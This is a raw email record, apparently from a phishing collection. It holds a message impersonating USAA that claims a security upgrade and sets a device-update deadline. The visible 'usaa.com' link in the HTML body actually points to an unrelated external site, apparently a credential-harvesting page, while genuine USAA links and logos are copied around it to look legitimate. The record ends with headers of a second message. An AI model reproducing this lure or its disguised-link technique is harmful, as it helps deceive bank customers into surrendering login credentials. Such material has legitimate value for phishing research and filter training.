From: "USAA" <usaaacctupdate@sccu4u.com>
Date: Fri, 30 Oct 2015 14:02:33 -0500
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 227

You will not see this in a MIME-aware mail reader.
--===============1146727088==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

To ensure delivery to your inbox, please add USAA.Customer.Service@mailcent=
er.usaa.com to your address book. 	 =

 	  =

	 =

	  =

Security Upgrade May Affect usaa.com Access	 =

View Accounts | Privacy Promise | Contact Us	 =

	  =

 =

	 	 =

	 	 =

	 	 =

	  =

USAA SECURITY ZONE =

USAA =

Member =

USAA # 	 =

	  =

	 =

	 =

	 =

	 =

 	 =

 	 =

  @page Section1:first { size:8.5in 11.0in; margin-top:0.75in; margin-right=
:0.75in; margin-bottom:0.75in; margin-left:0.75in } #messagebody div.rcmBod=
y div.Section1 { page:"Section1" } #messagebody div.rcmBody p.normal { font=
-family:"Verdana"; font-size:10.0pt; font-variant:normal; text-align:left; =
text-transform:none; margin-top:0.0pt; margin-right:0.0pt; margin-bottom:0.=
0pt; margin-left:0.0pt } #messagebody div.rcmBody table.normal { font-famil=
y:"Times New Roman"; font-size:10.0pt; font-variant:normal; text-align:left=
; text-transform:none; margin-top:0.0pt; margin-right:0.0pt; margin-bottom:=
0.0pt; margin-left:0.0pt; border-collapse:collapse }      =

 Dear Valued Member, =

    =

 We recently let you know that we are participating in a worldwide Internet=
 upgrade to increase online security for you and USAA. Access to usaa.com f=
or members who use devices with old operating systems may be affected by th=
is Internet upgrade. To update your account now, Log on to usaa.com. =

    =

  Device Update Deadline  =

 This is a final reminder that you'll need to check your device operating s=
ystem and update it if necessary by Nov 02, 2015. After this date, devices =
without an updated system will not be able to access usaa.com. =

    =

 If you need help updating your device, please contact your mobile service =
provider or computer retailer. If you have questions, please call us at 1-8=
77-632-3002 and say "technical support" when prompted. =

    =

 Thank you,  =

 USAA  =

    =

    =

 =

    =

 	    =

 =

   =

 USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288 =

    =

 =

 	 =

	  	 =

 =

Privacy Promise

 Please do not reply to this e-mail. To contact USAA, visit our secure cont=
act page.
	 =

129209-0215

	  	=20
--===============1146727088==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<div align=3D"center">
<table bgcolor=3D"#b5d7e6" border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 width=3D"650"><tbody><tr><td align=3D"center" background=3D"https://conten=
t.usaa.com/mcontent/static_assets/Media/email_emailbar_bg.gif" height=3D"35=
" valign=3D"middle" width=3D"650"><font style=3D"color: #929292; font-size:=
 9px" face=3D"Verdana, sans-serif">To
            ensure delivery to your inbox, please add <span style=3D"color:=
 #68A7C5">USAA.Customer.Service@mailcenter.usaa.com</span>
            to your address book.</font>
            </td><td>
      </td></tr></tbody></table><table bgcolor=3D"#b5d7e6" border=3D"0" cel=
lpadding=3D"0" cellspacing=3D"0" width=3D"650"><tbody><tr><td width=3D"10">=
&nbsp;</td>
            <td align=3D"left" bgcolor=3D"white">
            <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=
=3D"98%"><tbody><tr><td colspan=3D"4" height=3D"5"></td>
                  </tr><tr><td height=3D"45" width=3D"54"><a href=3D"https:=
//www.usaa.com/inet/ent_logon/Logon?EID=3D129209-0215_head" target=3D"_blan=
k" rel=3D"noreferrer"><img src=3D"https://content.usaa.com/mcontent/static_=
assets/Media/email_logo.gif" alt=3D"" border=3D"0" height=3D"41" width=3D"6=
1"></a></td>
                        <td>
                        <table border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0"><tbody><tr><td style=3D"font: bold 16px Arial, sans-serif; color: #6=
d6d6d" align=3D"left" height=3D"22"><span style=3D"display: block; margin-t=
op: 9px">Security Upgrade May Affect usaa.com Access</span></td>
                              </tr><tr><td align=3D"left" height=3D"23" now=
rap=3D"nowrap"><nobr><font face=3D"Verdana, sans-serif" size=3D"1"><a href=
=3D"https://www.usaa.com/inet/ent_home/CpHome?EID=3D129209-0215_head" style=
=3D"color: #6d6d6d; text-decoration: none" target=3D"_blank" rel=3D"norefer=
rer">View Accounts</a> | <a href=3D"https://www.usaa.com/inet/ent_utils/McS=
taticPages?key=3Dprivacy_promise&amp;EID=3D129209-0215_head" style=3D"color=
: #6d6d6d; text-decoration: none" target=3D"_blank" rel=3D"noreferrer">Priv=
acy Promise</a> | <a href=3D"https://www.usaa.com/inet/ent_contactus/CpLeve=
lZeroContactUs?ContactUsPageId=3DPublicContactUs&amp;EID=3D129209-0215_head=
" style=3D"color: #6d6d6d; text-decoration: none" target=3D"_blank" rel=3D"=
noreferrer">Contact Us</a></font></nobr></td>
                              </tr></tbody></table></td>
                        <td align=3D"right" height=3D"45" valign=3D"middle"=
 width=3D"367"><!-- node type 8 -->
                        =

                        <table border=3D"0" cellpadding=3D"0" cellspacing=
=3D"0" height=3D"65" width=3D"188"><tbody><tr><td width=3D"22">
                                    <table border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" height=3D"65" width=3D"22"><tbody><tr><td style=3D"line-he=
ight: 0px" height=3D"29" valign=3D"top" width=3D"8"><img src=3D"https://con=
tent.usaa.com/mcontent/static_assets/Media/email_sec_1-1.gif" alt=3D"" styl=
e=3D"display: block" border=3D"0" height=3D"29" width=3D"8"></td>
                                                <td style=3D"line-height: 0=
px" bgcolor=3D"#e7e7e8" height=3D"29" valign=3D"top" width=3D"14"><img src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif=
" alt=3D"" style=3D"display: block" border=3D"0" height=3D"29" width=3D"14"=
></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" height=3D"29" valign=3D"top" width=3D"8"><img src=3D"https://content=
.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" alt=3D"" style=
=3D"display: block" border=3D"0" height=3D"29" width=3D"8"></td>
                                                <td style=3D"line-height: 0=
px" bgcolor=3D"#e7e7e8" height=3D"29" valign=3D"top" width=3D"14"><img src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" alt=3D"" style=3D"display: block" border=3D"0" height=3D"29" width=3D"=
14"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" height=3D"7" valign=3D"bottom" width=3D"8"></td>
                                                <td style=3D"line-height: 0=
px" bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"bottom" width=3D"14"><img sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gi=
f" alt=3D"" style=3D"display: block" border=3D"0" height=3D"7" width=3D"14"=
></td>
                                          </tr></tbody></table></td>
                                    <td align=3D"left" bgcolor=3D"#e7e7e8">
                                    <table border=3D"0" cellpadding=3D"5" c=
ellspacing=3D"0" height=3D"65" width=3D"100%"><tbody><tr><td style=3D"text-=
align: left; font-size: 9px; line-height: 12px; -webkit-text-size-adjust: n=
one" align=3D"left" valign=3D"middle"><font style=3D"font-size: 10px; color=
: #00365b" face=3D"Arial, Helvetica, sans-serif"><strong>USAA
                                                SECURITY ZONE</strong></fon=
t> <br><font style=3D"font-size: 9px; color: #00365b" face=3D"Arial, Helvet=
ica, sans-serif">USAA</font>
                                                <br><font style=3D"font-siz=
e: 9px; color: #00365b" face=3D"Arial, Helvetica, sans-serif">Member</font>
                                                <br><font style=3D"font-siz=
e: 9px; color: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA # </font=
></td>
                                          </tr></tbody></table></td>
                                    <td bgcolor=3D"#ffffff" width=3D"7">
                                    <table border=3D"0" cellpadding=3D"0" c=
ellspacing=3D"0" height=3D"65" width=3D"7"><tbody><tr><td style=3D"line-hei=
ght: 0px" align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"top" w=
idth=3D"7"><img src=3D"https://content.usaa.com/mcontent/static_assets/Medi=
a/email_sec_1-3.gif" alt=3D"" style=3D"display: block" border=3D"0" height=
=3D"7" width=3D"7"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" align=3D"right" bgcolor=3D"#e7e7e8" height=3D"51" valign=3D"top" wid=
th=3D"7"><img src=3D"https://content.usaa.com/mcontent/static_assets/Media/=
email_sec_spacer.gif" alt=3D"" style=3D"display: block" border=3D"0" height=
=3D"51" width=3D"7"></td>
                                          </tr><tr><td style=3D"line-height=
: 0px" align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" valign=3D"bottom" w=
idth=3D"7"><img src=3D"https://content.usaa.com/mcontent/static_assets/Medi=
a/email_sec_2-2.gif" alt=3D"" style=3D"display: block" border=3D"0" height=
=3D"7" width=3D"7"></td>
                                          </tr></tbody></table></td>
                              </tr></tbody></table><!-- node type 8 --></td=
></tr><tr><td colspan=3D"4" height=3D"20">&nbsp;</td>
                  </tr><tr><td colspan=3D"4" height=3D"1">&nbsp;</td>
                  </tr></tbody></table><table border=3D"0" cellpadding=3D"0=
" cellspacing=3D"0" width=3D"100%"><tbody><tr><td align=3D"left"><font styl=
e=3D"color: #333333; font-size: 12px; line-height: 18px" face=3D"Verdana, s=
ans-serif">
                        <style type=3D"text/css">

@page Section1:first {
	size:8.5in 11.0in;
	margin-top:0.75in;
	margin-right:0.75in;
	margin-bottom:0.75in;
	margin-left:0.75in
}
#messagebody div.rcmBody div.Section1 {
	page:"Section1"
}

#messagebody div.rcmBody p.normal {
	font-family:"Verdana";
	font-size:10.0pt;
	font-variant:normal;
	text-align:left;
	text-transform:none;
	margin-top:0.0pt;
	margin-right:0.0pt;
	margin-bottom:0.0pt;
	margin-left:0.0pt
}
#messagebody div.rcmBody table.normal {
	font-family:"Times New Roman";
	font-size:10.0pt;
	font-variant:normal;
	text-align:left;
	text-transform:none;
	margin-top:0.0pt;
	margin-right:0.0pt;
	margin-bottom:0.0pt;
	margin-left:0.0pt;
	border-collapse:collapse
}
</style>
<div class=3D"Section1"><div style=3D"margin-left: 1em; margin-right: 1em">
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span class=3D"DLSVAR" style=3D"margin-bottom: 0.0pt">Dear&nbsp;Val=
ued&nbsp;Member,</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">We
                recently let you know that we are participating in a
                worldwide Internet upgrade to increase online security
                for you and USAA. Access to usaa.com for members who use
                devices with old operating systems may be affected by
                this Internet upgrade. To update your account now, Log on
                to <a href=3D"http://www.joburgmarket.co.za/newsletter3/ima=
gestory4.htm" style=3D"color: blue; text-align: left; text-transform: none;=
 text-decoration: underline; text-underline: solid" target=3D"_blank" rel=
=3D"noreferrer">usaa.com</a>. </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">
                <b>Device Update Deadline<span></span></b><span style=3D"fo=
nt-weight: bold">
</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">This is a
                final reminder that you'll need to check your device
                operating system and update it if necessary by Nov 02,
                2015. <b>After this date, devices without an updated
                    system will not be able to access usaa.com.</b> </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt">If you
                need help updating your device, please contact your
                mobile service provider or computer retailer. If you
                have questions, please call us at 1-877-632-3002 and say
                "technical support" when prompted. </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt; page-break-before: auto"><span>Thank you,<span></span></span><span>
</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt; page-break-before: auto"><span>USAA<span></span></span><span>
</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt; page-break-before: auto"><span style=3D"color: #000000; font-size: =
8.0pt"><span>
</span></span><span style=3D"color: #000000; font-size: 8.0pt">&nbsp;</span>
            </p>
            <p class=3D"normal" style=3D"font-style: normal; margin-bottom:=
 0.0pt"><span>
</span><span>&nbsp;</span>
            </p>
            <table class=3D"normal" style=3D"font-style: normal"><tbody><tr=
 style=3D"height: 0.35in"><td style=3D"padding-top: 0.0in; padding-right: 0=
.0in; padding-bottom: 0.0in; padding-left: 0.0in; width: 27.9pt; height: 0.=
35in; border: none" valign=3D"top"><p class=3D"normal" style=3D"font-style:=
 normal; margin-bottom: 0.0pt"><span style=3D"display: none"></span> <a hre=
f=3D"http://www.facebook.com/USAA" target=3D"_blank" rel=3D"noreferrer"><im=
g alt=3D"" src=3D"http://content.usaa.com/mcontent/static_assets/om/Media/f=
acebookIcon.gif" border=3D"0" height=3D"29" width=3D"29"></a> <a href=3D"ht=
tp://www.facebook.com/USAA" style=3D"color: blue; text-align: left; text-tr=
ansform: none; text-decoration: underline; text-underline: solid" target=3D=
"_blank" rel=3D"noreferrer"><span style=3D"color: #000000"><span></span></s=
pan>
                            </a> </p>
                    </td><td style=3D"padding-top: 0.0in; padding-right: 0.=
0in; padding-bottom: 0.0in; padding-left: 0.0in; width: 30.6pt; height: 0.3=
5in; border: none" valign=3D"top"><p class=3D"normal" style=3D"font-style: =
normal; margin-bottom: 0.0pt"><span style=3D"display: none"></span> <a href=
=3D"http://twitter.com/usaa" target=3D"_blank" rel=3D"noreferrer"><img alt=
=3D"" src=3D"http://content.usaa.com/mcontent/static_assets/om/Media/twitte=
rIcon.gif" border=3D"0" height=3D"29" width=3D"29"></a> <a href=3D"http://t=
witter.com/usaa" style=3D"color: blue; text-align: left; text-transform: no=
ne; text-decoration: underline; text-underline: solid" target=3D"_blank" re=
l=3D"noreferrer"><span style=3D"color: #000000"><span></span></span>
                            </a> </p>
                    </td></tr></tbody></table></div><table class=3D"normal"=
 style=3D"background: #b5d7e6; font-style: normal"><tbody><tr><td style=3D"=
padding-top: 0.0in; padding-right: 5.4pt; padding-bottom: 0.0in; padding-le=
ft: 5.4pt; width: 7.15in; border: none" valign=3D"top"><p class=3D"normal" =
style=3D"font-style: normal; text-align: center; margin-bottom: 0.0pt; tab-=
stops: 58.9pt"><span style=3D"color: #6d6d6d; font-size: 7.5pt"><span style=
=3D"text-align: left"> </span><span></span></span><span style=3D"color: #6d=
6d6d; font-size: 7.5pt">
</span>
                        </p>
                        <p class=3D"normal" style=3D"font-style: normal; te=
xt-align: center; margin-bottom: 0.0pt; tab-stops: 58.9pt"><span style=3D"c=
olor: #6d6d6d; font-size: 7.5pt"><span class=3D"DLSVAR">USAA,&nbsp;9800&nbs=
p;Fredericksburg&nbsp;Road,&nbsp;San&nbsp;Antonio,&nbsp;Texas&nbsp;78288</s=
pan></span><span style=3D"color: #6d6d6d; font-size: 7.5pt"><span></span></=
span>
                        </p>
                        <p class=3D"normal" style=3D"font-style: normal; ma=
rgin-bottom: 0.0pt; page-break-before: auto"><span style=3D"color: red; fon=
t-size: 8.0pt"><span>
</span></span><span style=3D"color: red; font-size: 8.0pt">&nbsp;</span>
                        </p>
                    </td></tr></tbody></table></div>
    </font></td>
                  </tr></tbody></table></td>
            <td width=3D"10">&nbsp;</td>
      </tr><!-- node type 8 --><tr bgcolor=3D"#b5d7e6"><td colspan=3D"2" al=
ign=3D"center"><font style=3D"color: #6d6d6d; font-size: 10px; line-height:=
 18px" face=3D"Verdana, sans-serif">
          <br><a href=3D"https://www.usaa.com/inet/pages/privacy_promise?EI=
D=3D129209-0215_foot" target=3D"_blank" rel=3D"noreferrer">Privacy Promise<=
/a><br><br>

          =

Please do not reply to this e-mail. To contact USAA, visit our secure <a hr=
ef=3D"https://www.usaa.com/inet/ent_references/CpSendUsAMessage?ContentArea=
=3Dcp&amp;EID=3D129209-0215_foot" target=3D"_blank" rel=3D"noreferrer">cont=
act page</a>.<br></font></td>
     </tr><tr bgcolor=3D"#b5d7e6"><td colspan=3D"2" align=3D"right"><font s=
tyle=3D"color: #6d6d6d; font-size: 10px; line-height: 18px" face=3D"Verdana=
, sans-serif">129209-0215</font><br><br></td>
            <td>&nbsp;</td>
      </tr></tbody></table></div>
--===============1146727088==--

From jose@monkey.org Sat Oct 31 13:37:32 2015 +0000
Return-Path: wwwsreeindyaprop@srv.indservers.co.in
Delivered-To: jose@monkey.org
X-FDA: 70802505144.09.start23_5ea16cf202c40
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 64,4,0,c5fa142ad7cf9384,d41d8cd98f00b204,wwwsreeindyaprop@srv.indservers.co.in,:,RULES_HIT:2:41:46:72:150:152:196:355:375:379:543:962:967:969:970:973:978:983:988:989:1189:1208:1216:1224:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1515:1516:1517:1535:1571:1588:1589:1592:1593:1594:1622:1676:1714:1730:1747:1777:1792:1801:1803:2194:2198:2199:2200:2393:2525:2527:2549:2551:2560:2563:2610:2612:2682:2685:2731:2859:2890:2892:2894:2898:2900:2902:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:2975:2976:3000:3022:3138:3139:3140:3141:3142:3351:3586:3664:3747:3865:3867:3870:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4049:4118:4321:4605:4878:5007:6238:6261:6650:6669:6678:7903:8518:8551:8568:8583:8603:8660:9025:9080:9149:9388:10231:10346:11656:11657:11658:11914:11984:12043:12050:12114:12295:12555:12955:12963:12973:13139:13148:13230:13374:13894:14096:14149:21067:21080:21094:30001:30019:30054:30055:30070:30075:30091,0,RBL:107.190.133.208:@srv.in
X-HE-Tag: start23_5ea16cf202c40
X-Filterd-Recvd-Size: 7756
Received: from srv.indservers.co.in (srv.indservers.co.in [107.190.133.208])
	by imf10.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat, 31 Oct 2015 13:37:30 +0000 (UTC)
Received: from wwwsreeindyaprop by srv.indservers.co.in with local (Exim 4.86)
	(envelope-from <wwwsreeindyaprop@srv.indservers.co.in>)
	id 1ZsWMH-0004MK-4B
	for jose@monkey.org; Sat, 31 Oct 2015 19:08:13 +0530
Date: Sat, 31 Oct 2015 13:38:13 +0000
To: jose@monkey.org
